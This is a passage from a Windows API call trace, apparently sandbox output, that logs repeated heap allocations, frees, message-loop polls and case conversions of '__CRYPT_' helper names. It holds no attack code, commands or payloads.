lpMsg=0x8ceee0) returned 0 [0244.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0244.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0244.291] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0244.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0244.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f10 [0244.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0244.292] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0244.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0244.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0244.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0244.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0244.292] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0244.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0244.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0244.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0244.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0244.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0244.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0244.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0244.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0244.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0244.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0244.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0244.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0244.292] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0244.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0244.292] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0244.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0244.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0244.292] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0244.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0244.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0244.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0244.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0244.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0244.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0244.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0244.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0244.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0244.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0244.293] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0244.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0244.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0244.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0244.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0244.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0244.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0244.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0244.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0244.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0244.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0244.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0244.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0244.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0244.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0244.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0244.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0244.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0244.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0244.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0244.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0244.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0244.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0244.294] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0244.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0244.295] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0244.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0244.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0244.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0244.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0244.295] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55fb8 [0244.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0244.295] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0244.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55fb8 | out: hHeap=0x970000) returned 1 [0244.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0244.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50dd0 [0244.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0244.295] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0244.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0244.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0244.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0244.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0244.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0244.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0244.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0244.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0244.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0244.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0244.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0244.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0244.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0244.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0244.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0244.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0244.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0244.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0244.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0244.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0244.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0244.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0244.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0244.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0244.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0244.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0244.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0244.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0244.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0244.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0244.296] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0244.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0244.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0244.296] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0244.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0244.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0244.296] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0244.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0244.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0244.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0244.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0244.296] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0244.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0244.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0244.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0244.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0244.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0244.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0244.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0244.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0244.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0244.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0244.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0244.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0244.297] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0244.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0244.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0244.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0244.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0244.297] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0244.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0244.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0244.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0244.297] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0244.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0244.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0244.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0244.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0244.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0244.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0244.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0244.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0244.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0244.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0244.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0244.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0244.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0244.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0244.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0244.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0244.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0244.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0244.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0244.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0244.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0244.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0244.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0244.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0244.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0244.298] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0244.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0244.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0244.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0244.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0244.298] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0244.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0244.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0244.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0244.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0244.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0244.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0244.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0244.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0244.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0244.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0244.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0244.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0244.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0244.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0244.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0244.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0244.299] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0244.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0244.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0244.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0244.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0244.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0244.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0244.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0244.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0244.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0244.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 